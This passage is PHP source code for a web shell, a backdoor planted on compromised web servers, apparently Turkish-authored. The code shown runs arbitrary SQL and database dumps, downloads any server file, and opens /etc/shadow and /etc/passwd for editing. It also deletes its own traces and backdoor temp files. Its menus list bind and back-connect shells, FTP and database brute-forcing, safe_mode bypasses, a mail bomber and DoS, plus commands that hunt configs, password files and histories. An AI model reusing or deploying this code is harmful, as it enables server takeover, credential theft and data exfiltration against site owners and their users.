for($i=0;$i<$this->num_rows;$i++)
1209
1210
{
1211
1212
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
1213
1214
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `",$this->columns).'`) VALUES (\''.@implode("', '",$this->rows[$i]).'\');';
1215
1216
}
1217
1218
break;
1219
1220
case 'MSSQL':
1221
1222
$this->dump[0] = '## MSSQL dump';
1223
1224
if($this->query('SELECT * FROM '.$table)!=1) return 0;
1225
1226
if(!$this->get_result()) return 0;
1227
1228
for($i=0;$i<$this->num_rows;$i++)
1229
1230
{
1231
1232
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1233
1234
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');';
1235
1236
}
1237
1238
break;
1239
1240
case 'PostgreSQL':
1241
1242
$this->dump[0] = '## PostgreSQL dump';
1243
1244
if($this->query('SELECT * FROM '.$table)!=1) return 0;
1245
1246
if(!$this->get_result()) return 0;
1247
1248
for($i=0;$i<$this->num_rows;$i++)
1249
1250
{
1251
1252
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1253
1254
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');';
1255
1256
}
1257
1258
break;
1259
1260
case 'Oracle':
1261
1262
$this->dump[0] = '## ORACLE dump';
1263
1264
$this->dump[]  = '## under construction';
1265
1266
break;
1267
1268
default:
1269
1270
return 0;
1271
1272
break;
1273
1274
}
1275
1276
return 1;
1277
1278
}
1279
1280
function close()
1281
1282
{
1283
1284
switch($this->db)
1285
1286
{
1287
1288
case 'MySQL': 
1289
1290
@mysql_close($this->connection);
1291
1292
break;
1293
1294
case 'MSSQL':
1295
1296
@mssql_close($this->connection);
1297
1298
break;
1299
1300
case 'PostgreSQL':
1301
1302
@pg_close($this->connection);
1303
1304
break;
1305
1306
case 'Oracle':
1307
1308
@oci_close($this->connection);
1309
1310
break;
1311
1312
}
1313
1314
}
1315
1316
function affected_rows()
1317
1318
{
1319
1320
switch($this->db)
1321
1322
{
1323
1324
case 'MySQL':
1325
1326
return @mysql_affected_rows($this->res);
1327
1328
break;
1329
1330
case 'MSSQL':
1331
1332
return @mssql_affected_rows($this->res);
1333
1334
break;
1335
1336
case 'PostgreSQL':
1337
1338
return @pg_affected_rows($this->res);
1339
1340
break;
1341
1342
case 'Oracle':
1343
1344
return @ocirowcount($this->res);
1345
1346
break;
1347
1348
default:
1349
1350
return 0;
1351
1352
break;
1353
1354
}
1355
1356
}
1357
1358
}
1359
1360
if(!empty($_POST['cmd']) &&$_POST['cmd']=="download_file"&&!empty($_POST['d_name']))
1361
1362
{
1363
1364
if($file=@fopen($_POST['d_name'],"r")){$filedump = @fread($file,@filesize($_POST['d_name']));@fclose($file);}
1365
1366
else if ($file=readzlib($_POST['d_name'])) {$filedump = $file;}else {err(1,$_POST['d_name']);$_POST['cmd']="";}
1367
1368
if(isset($_POST['cmd'])) 
1369
1370
{
1371
1372
@ob_clean();
1373
1374
$filename = @basename($_POST['d_name']);
1375
1376
$content_encoding=$mime_type='';
1377
1378
compress($filename,$filedump,$_POST['compress']);
1379
1380
if (!empty($content_encoding)) {header('Content-Encoding: '.$content_encoding);}
1381
1382
header("Content-type: ".$mime_type);
1383
1384
header("Content-disposition: attachment; filename=\"".$filename."\";");
1385
1386
echo $filedump;
1387
1388
exit();
1389
1390
}
1391
1392
}
1393
1394
if(isset($_GET['phpinfo'])) {echo @phpinfo();echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";die();}
1395
1396
if (!empty($_POST['cmd']) &&$_POST['cmd']=="db_query")
1397
1398
{
1399
1400
echo $head;
1401
1402
$sql = new my_sql();
1403
1404
$sql->db   = $_POST['db'];
1405
1406
$sql->host = $_POST['db_server'];
1407
1408
$sql->port = $_POST['db_port'];
1409
1410
$sql->user = $_POST['mysql_l'];
1411
1412
$sql->pass = $_POST['mysql_p'];
1413
1414
$sql->base = $_POST['mysql_db'];
1415
1416
$querys = @explode(';',$_POST['db_query']);
1417
1418
echo '<body bgcolor=#000000>';
1419
1420
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
1421
1422
else 
1423
1424
{
1425
1426
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
1427
1428
else
1429
1430
{
1431
1432
foreach($querys as $num=>$query) 
1433
1434
{
1435
1436
if(strlen($query)>5)
1437
1438
{
1439
1440
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
1441
1442
switch($sql->query($query))
1443
1444
{
1445
1446
case '0':
1447
1448
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
1449
1450
break;
1451
1452
case '1': 
1453
1454
if($sql->get_result())
1455
1456
{
1457
1458
echo "<table width=100%>";
1459
1460
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
1461
1462
$keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;",$sql->columns);
1463
1464
echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
1465
1466
for($i=0;$i<$sql->num_rows;$i++)
1467
1468
{
1469
1470
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
1471
1472
$values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
1473
1474
echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
1475
1476
}
1477
1478
echo "</table>";
1479
1480
}
1481
1482
break;
1483
1484
case '2':
1485
1486
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
1487
1488
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
1489
1490
break;
1491
1492
}
1493
1494
}
1495
1496
}
1497
1498
}
1499
1500
}
1501
1502
echo "<br><form name=form method=POST>";
1503
1504
echo in('hidden','db',0,$_POST['db']);
1505
1506
echo in('hidden','db_server',0,$_POST['db_server']);
1507
1508
echo in('hidden','db_port',0,$_POST['db_port']);
1509
1510
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
1511
1512
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
1513
1514
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
1515
1516
echo in('hidden','cmd',0,'db_query');
1517
1518
echo "<div align=center>";
1519
1520
echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
1521
1522
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
1523
1524
echo "</form>";
1525
1526
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";die();
1527
1528
}
1529
1530
if(isset($_GET['delete']))
1531
1532
{
1533
1534
@unlink(__FILE__);
1535
1536
}
1537
1538
if(isset($_GET['tmp']))
1539
1540
{
1541
1542
@unlink("/tmp/bdpl");
1543
1544
@unlink("/tmp/back");
1545
1546
@unlink("/tmp/bd");
1547
1548
@unlink("/tmp/bd.c");
1549
1550
@unlink("/tmp/dp");
1551
1552
@unlink("/tmp/dpc");
1553
1554
@unlink("/tmp/dpc.c");
1555
1556
@unlink("/tmp/prxpl");
1557
1558
@unlink("/tmp/grep.txt");
1559
1560
}
1561
1562
if(isset($_GET['phpini']))
1563
1564
{
1565
1566
echo $head;
1567
1568
function U_value($value)
1569
1570
{
1571
1572
if ($value == '') return '<i>no value</i>';
1573
1574
if (@is_bool($value)) return $value ?'TRUE': 'FALSE';
1575
1576
if ($value === null) return 'NULL';
1577
1578
if (@is_object($value)) $value = (array) $value;
1579
1580
if (@is_array($value))
1581
1582
{
1583
1584
@ob_start();
1585
1586
print_r($value);
1587
1588
$value = @ob_get_contents();
1589
1590
@ob_end_clean();
1591
1592
}
1593
1594
return U_wordwrap((string) $value);
1595
1596
}
1597
1598
function U_wordwrap($str)
1599
1600
{
1601
1602
$str = @wordwrap(@htmlspecialchars($str),100,'<wbr />',true);
1603
1604
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!','$1$2<wbr />',$str);
1605
1606
}
1607
1608
if (@function_exists('ini_get_all'))
1609
1610
{
1611
1612
$r = '';
1613
1614
echo '<table width=100%>','<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
1615
1616
foreach (@ini_get_all() as $key=>$value)
1617
1618
{
1619
1620
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
1621
1622
}
1623
1624
echo $r;
1625
1626
echo '</table>';
1627
1628
}
1629
1630
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1631
1632
die();
1633
1634
}
1635
1636
if(isset($_GET['cpu']))
1637
1638
{
1639
1640
echo $head;
1641
1642
echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
1643
1644
$cpuf = @file("cpuinfo");
1645
1646
if($cpuf)
1647
1648
{
1649
1650
$c = @sizeof($cpuf);
1651
1652
for($i=0;$i<$c;$i++)
1653
1654
{
1655
1656
$info = @explode(":",$cpuf[$i]);
1657
1658
if($info[1]==""){$info[1]="---";}
1659
1660
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1661
1662
}
1663
1664
echo $r;
1665
1666
}
1667
1668
else
1669
1670
{
1671
1672
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1673
1674
}
1675
1676
echo '</table>';
1677
1678
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1679
1680
die();
1681
1682
}
1683
1684
if(isset($_GET['mem']))
1685
1686
{
1687
1688
echo $head;
1689
1690
echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
1691
1692
$memf = @file("meminfo");
1693
1694
if($memf)
1695
1696
{
1697
1698
$c = sizeof($memf);
1699
1700
for($i=0;$i<$c;$i++)
1701
1702
{
1703
1704
$info = explode(":",$memf[$i]);
1705
1706
if($info[1]==""){$info[1]="---";}
1707
1708
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1709
1710
}
1711
1712
echo $r;
1713
1714
}
1715
1716
else
1717
1718
{
1719
1720
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1721
1722
}
1723
1724
echo '</table>';
1725
1726
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">green</a> ]</b></font></div>";
1727
1728
die();
1729
1730
}
1731
1732
if(isset($_GET['dmesg(8)']))
1733
1734
{$_POST['cmd'] = 'dmesg(8)';}
1735
1736
if(isset($_GET['free']))
1737
1738
{$_POST['cmd'] = 'free';}
1739
1740
if(isset($_GET['vmstat']))
1741
1742
{$_POST['cmd'] = 'vmstat';}
1743
1744
if(isset($_GET['lspci']))
1745
1746
{$_POST['cmd'] = 'lspci';}
1747
1748
if(isset($_GET['lsdev']))
1749
1750
{$_POST['cmd'] = 'lsdev';}
1751
1752
if(isset($_GET['procinfo']))
1753
1754
{$_POST['cmd']='cat /proc/cpuinfo';}
1755
1756
if(isset($_GET['version']))
1757
1758
{$_POST['cmd']='cat /proc/version';}
1759
1760
if(isset($_GET['interrupts']))
1761
1762
{$_POST['cmd']='cat /proc/interrupts';}
1763
1764
if(isset($_GET['realise1']))
1765
1766
{$_POST['cmd'] = 'cat /etc/*realise';}
1767
1768
if(isset($_GET['service']))
1769
1770
{$_POST['cmd'] = 'service --status-all';}
1771
1772
if(isset($_GET['ifconfig']))
1773
1774
{$_POST['cmd'] = 'ifconfig';}
1775
1776
if(isset($_GET['w']))
1777
1778
{$_POST['cmd'] = 'w';}
1779
1780
if(isset($_GET['who']))
1781
1782
{$_POST['cmd'] = 'who';}
1783
1784
if(isset($_GET['uptime']))
1785
1786
{$_POST['cmd'] = 'uptime';}
1787
1788
if(isset($_GET['last']))
1789
1790
{$_POST['cmd'] = 'last -n 10';}
1791
1792
if(isset($_GET['psaux']))
1793
1794
{$_POST['cmd'] = 'ps -aux';}
1795
1796
if(isset($_GET['netstat']))
1797
1798
{$_POST['cmd'] = 'netstat -a';}
1799
1800
if(isset($_GET['lsattr']))
1801
1802
{$_POST['cmd'] = 'lsattr -va';}
1803
1804
if(isset($_GET['syslog']))
1805
1806
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
1807
1808
if(isset($_GET['fstab']))
1809
1810
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
1811
1812
if(isset($_GET['fdisk']))
1813
1814
{$_POST['cmd'] = 'fdisk -l';}
1815
1816
if(isset($_GET['df']))
1817
1818
{$_POST['cmd'] = 'df -h';}
1819
1820
if(isset($_GET['realise2']))
1821
1822
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
1823
1824
if(isset($_GET['hosts']))
1825
1826
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
1827
1828
if(isset($_GET['resolv']))
1829
1830
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
1831
1832
if(isset($_GET['systeminfo']))
1833
1834
{$_POST['cmd'] = 'systeminfo';}
1835
1836
if(isset($_GET['shadow']))
1837
1838
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
1839
1840
if(isset($_GET['passwd']))
1841
1842
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
1843
1844
$lang=array(
1845
1846
'tr_text1'=>'Komut Uygula',
1847
1848
'tr_text2'=>'Server uzerinde komut calistir ',
1849
1850
'tr_text3'=>'Komut istemi ',
1851
1852
'tr_text4'=>'Calisma Dizini ',
1853
1854
'tr_text5'=>'Servere Dosya Upload Et',
1855
1856
'tr_text6'=>'Yerel Dosya ',
1857
1858
'tr_text7'=>'Dizin Veya Dosya Bul ',
1859
1860
'tr_text8'=>'Sec',
1861
1862
'tr_butt1'=>'Uygula',
1863
1864
'tr_butt2'=>'Yukle',
1865
1866
'tr_text9'=>'Porta baglan /bin/bash',
1867
1868
'tr_text10'=>'Port',
1869
1870
'tr_text11'=>'Sifre Giris',
1871
1872
'tr_butt3'=>'Baglan',
1873
1874
'tr_text12'=>'Back-Connect',
1875
1876
'tr_text13'=>'IP',
1877
1878
'tr_text14'=>'Port',
1879
1880
'tr_butt4'=>'Baglan',
1881
1882
'tr_text15'=>'Uzaktan servere dosya yukle',
1883
1884
'tr_text16'=>'ile',
1885
1886
'tr_text17'=>'Uzak Dosya',
1887
1888
'tr_text18'=>'Yerel Dosya',
1889
1890
'tr_text19'=>'Exploits',
1891
1892
'tr_text20'=>'Kullan',
1893
1894
'tr_text21'=>'&nbsp;Yeni ad',
1895
1896
'tr_text22'=>'datapipe',
1897
1898
'tr_text23'=>'Yerel Port',
1899
1900
'tr_text24'=>'Uzak Host',
1901
1902
'tr_text25'=>'Uzak Port',
1903
1904
'tr_text26'=>'Kullan',
1905
1906
'tr_butt5'=>'Iste',
1907
1908
'tr_text28'=>'Guvenlik Modunda Calis',
1909
1910
'tr_text29'=>'Giris Yok ',
1911
1912
'tr_butt6'=>'Degistir',
1913
1914
'tr_text30'=>'Cat file',
1915
1916
'tr_butt7'=>'Goster',
1917
1918
'tr_text31'=>'Dosya Bulunamadi',
1919
1920
'tr_text32'=>'PHP Kod Degerlendir ',
1921
1922
'tr_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
1923
1924
'tr_butt8'=>'Testet',
1925
1926
'tr_text34'=>'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.',
1927
1928
'tr_text35'=>'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.',
1929
1930
'tr_text36'=>'Database[VeriTabani]',
1931
1932
'tr_text37'=>'Kullanici',
1933
1934
'tr_text38'=>'Sifre',
1935
1936
'tr_text39'=>'Tablo',
1937
1938
'tr_text40'=>'Dump database table[DB Tablosu dok]',
1939
1940
'tr_butt9'=>'Dump',
1941
1942
'tr_text41'=>'DB dosyalarini kaydet.[Dump filed]',
1943
1944
'tr_text42'=>'Dosya Duzenle ',
1945
1946
'tr_text43'=>'Dosya Duzenlemek icin',
1947
1948
'tr_butt10'=>'Kaydet',
1949
1950
'tr_text44'=>'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor',
1951
1952
'tr_text45'=>'Dosya Kaydedildi',
1953
1954
'tr_text46'=>'PHP info Goster()',
1955
1956
'tr_text47'=>'Php.ini dosyasinda ki degiskenleri goster',
1957
1958
'tr_text48'=>'Temp dosylarini sil',
1959
1960
'tr_butt11'=>'Dosya Duzenle',
1961
1962
'tr_text49'=>'Server dan bu scripti sil',
1963
1964
'tr_text50'=>'CPU bilgisini incele',
1965
1966
'tr_text51'=>'Memory[hafiza] bilgisini incele]',
1967
1968
'tr_text52'=>'Metni Bul ',
1969
1970
'tr_text53'=>'Klasor Bul',
1971
1972
'tr_text54'=>'Dosyalarda ki Metni Bul',
1973
1974
'tr_butt12'=>'Bul',
1975
1976
'tr_text55'=>'Dosya Bul ',
1977
1978
'tr_text56'=>'Bulunmadi :( KeyCoder :)',
1979
1980
'tr_text57'=>'Olustur/Sil Dosya/Dizin ',
1981
1982
'tr_text58'=>'isim',
1983
1984
'tr_text59'=>'Dosya',
1985
1986
'tr_text60'=>'Dizin',
1987
1988
'tr_butt13'=>'Olustur/Sil',
1989
1990
'tr_text61'=>'Dosya Olustur',
1991
1992
'tr_text62'=>'Dizin Olustur',
1993
1994
'tr_text63'=>'Dosya Sil',
1995
1996
'tr_text64'=>'Dizin Sil',
1997
1998
'tr_text65'=>'Olustur',
1999
2000
'tr_text66'=>'Sil',
2001
2002
'tr_text67'=>'Chown/Chgrp/Chmod',
2003
2004
'tr_text68'=>'Uygula',
2005
2006
'tr_text69'=>'param1',
2007
2008
'tr_text70'=>'param2',
2009
2010
'tr_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
2011
2012
'tr_text72'=>'Metin Bul',
2013
2014
'tr_text73'=>'Klasor Bul',
2015
2016
'tr_text74'=>'Dosya Bul',
2017
2018
'tr_text75'=>'* you can use regexp',
2019
2020
'tr_text76'=>'Metin Ara Dosyalarin icinde Arama Yoluyla',
2021
2022
'tr_text80'=>'Cesit',
2023
2024
'tr_text81'=>'Net',
2025
2026
'tr_text82'=>'Databases',
2027
2028
'tr_text83'=>'SQL Sorgusu Yap',
2029
2030
'tr_text84'=>'SQL Sorgusu',
2031
2032
'tr_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
2033
2034
'tr_text86'=>'Download files from server',
2035
2036
'tr_butt14'=>'Download',
2037
2038
'tr_text87'=>'Download files from remote ftp-server',
2039
2040
'tr_text88'=>'server:port',
2041
2042
'tr_text89'=>'File on ftp',
2043
2044
'tr_text90'=>'Transfer mode',
2045
2046
'tr_text91'=>'Archivation',
2047
2048
'tr_text92'=>'without arch.',
2049
2050
'tr_text93'=>'FTP',
2051
2052
'tr_text94'=>'FTP-bruteforce',
2053
2054
'tr_text95'=>'Users list',
2055
2056
'tr_text96'=>'Can\'t get users list',
2057
2058
'tr_text97'=>'checked: ',
2059
2060
'tr_text98'=>'success: ',
2061
2062
'tr_text99'=>'/etc/passwd',
2063
2064
'tr_text100'=>'Send file to remote ftp server',
2065
2066
'tr_text101'=>'Use reverse (user -> resu)',
2067
2068
'tr_text102'=>'Mail',
2069
2070
'tr_text103'=>'Send email',
2071
2072
'tr_text104'=>'Send file to email',
2073
2074
'tr_text105'=>'To',
2075
2076
'tr_text106'=>'From',
2077
2078
'tr_text107'=>'Subj',
2079
2080
'tr_butt15'=>'Send',
2081
2082
'tr_text108'=>'Mail',
2083
2084
'tr_text109'=>'Hide',
2085
2086
'tr_text110'=>'Show',
2087
2088
'tr_text111'=>'SQL-Server : Port',
2089
2090
'tr_text112'=>'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)',
2091
2092
'tr_text113'=>'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)',
2093
2094
'tr_text114'=>'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)',
2095
2096
'tr_text115'=>'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
2097
2098
'tr_text116'=>'Copy from',
2099
2100
'tr_text117'=>'to',
2101
2102
'tr_text118'=>'File copied',
2103
2104
'tr_text119'=>'Cant copy file',
2105
2106
'tr_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
2107
2108
'tr_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
2109
2110
'tr_text122'=>'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)',
2111
2112
'tr_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
2113
2114
'tr_text124'=>'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)',
2115
2116
'tr_text125'=>'Data',
2117
2118
'tr_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
2119
2120
'tr_text127'=>'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)',
2121
2122
'tr_text128'=>'Modify/Access date(touch)',
2123
2124
'tr_text129'=>'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)',
2125
2126
'tr_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
2127
2128
'tr_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
2129
2130
'tr_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
2131
2132
'tr_text133'=>'',
2133
2134
'tr_text134'=>'Database-bruteforce',
2135
2136
'tr_text135'=>'Dictionary',
2137
2138
'tr_text136'=>'Creating evil symlink',
2139
2140
'tr_text137'=>'Useful',
2141
2142
'tr_text138'=>'Dangerous',
2143
2144
'tr_text139'=>'Mail Bomber',
2145
2146
'tr_text140'=>'DoS',
2147
2148
'tr_text141'=>'Danger! Web-daemon crash possible.',
2149
2150
'tr_err0'=>'Error! Can\'t write in file ',
2151
2152
'tr_err1'=>'Error! Can\'t read file ',
2153
2154
'tr_err2'=>'Error! Can\'t create ',
2155
2156
'tr_err3'=>'Error! Can\'t connect to ftp',
2157
2158
'tr_err4'=>'Error! Can\'t login on ftp server',
2159
2160
'tr_err5'=>'Error! Can\'t change dir on ftp',
2161
2162
'tr_err6'=>'Error! Can\'t sent mail',
2163
2164
'tr_err7'=>'Mail send',
2165
2166
);
2167
2168
$aliases=array(
2169
2170
'----------------------------------locate'=>'',
2171
2172
'locate httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
2173
2174
'locate vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
2175
2176
'locate proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
2177
2178
'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
2179
2180
'locate my.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate my.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
2181
2182
'locate admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2183
2184
'locate cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2185
2186
'locate conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2187
2188
'locate config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',
2189
2190
'locate config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2191
2192
'locate config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',
2193
2194
'locate config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2195
2196
'locate config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',
2197
2198
'locate .conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".conf" >> /tmp/grep.txt;cat /tmp/grep.txt',
2199
2200
'locate .pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',
2201
2202
'locate .sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".sql" >> /tmp/grep.txt;cat /tmp/grep.txt',
2203
2204
'locate .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".htpasswd" >> /tmp/grep.txt;cat /tmp/grep.txt',
2205
2206
'locate .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".bash_history" >> /tmp/grep.txt;cat /tmp/grep.txt',
2207
2208
'locate .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".mysql_history" >> /tmp/grep.txt;cat /tmp/grep.txt',
2209
2210
'locate backup files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate backup >> /tmp/grep.txt;cat /tmp/grep.txt',
2211
2212
'locate dump files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate dump >> /tmp/grep.txt;cat /tmp/grep.txt',
2213
2214
'locate priv files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate priv >> /tmp/grep.txt;cat /tmp/grep.txt',
2215
2216
'----------------------------------tar'=>'',
2217
2218
'tar -czvf all.tgz -T /tmp/grep.txt'=>'tar -czvf all.tgz -T /tmp/grep.txt',
2219
2220
'----------------------------------1'=>'',
2221
2222
'locate access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access_log >> /tmp/grep.txt;cat /tmp/grep.txt',
2223
2224
'locate error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error_log >> /tmp/grep.txt;cat /tmp/grep.txt',
2225
2226
'locate access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access.log >> /tmp/grep.txt;cat /tmp/grep.txt',
2227
2228
'locate error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error.log >> /tmp/grep.txt;cat /tmp/grep.txt',
2229
2230
'locate ".log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".log" >> /tmp/grep.txt;cat /tmp/grep.txt',
2231
2232
'----------------------------------2'=>'',
2233
2234
'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;cat /tmp/grep.txt'=>'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt',
2235
2236
'----------------------------------find'=>'',
2237
2238
'find suid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
2239
2240
'find suid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
2241
2242
'find sgid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
2243
2244
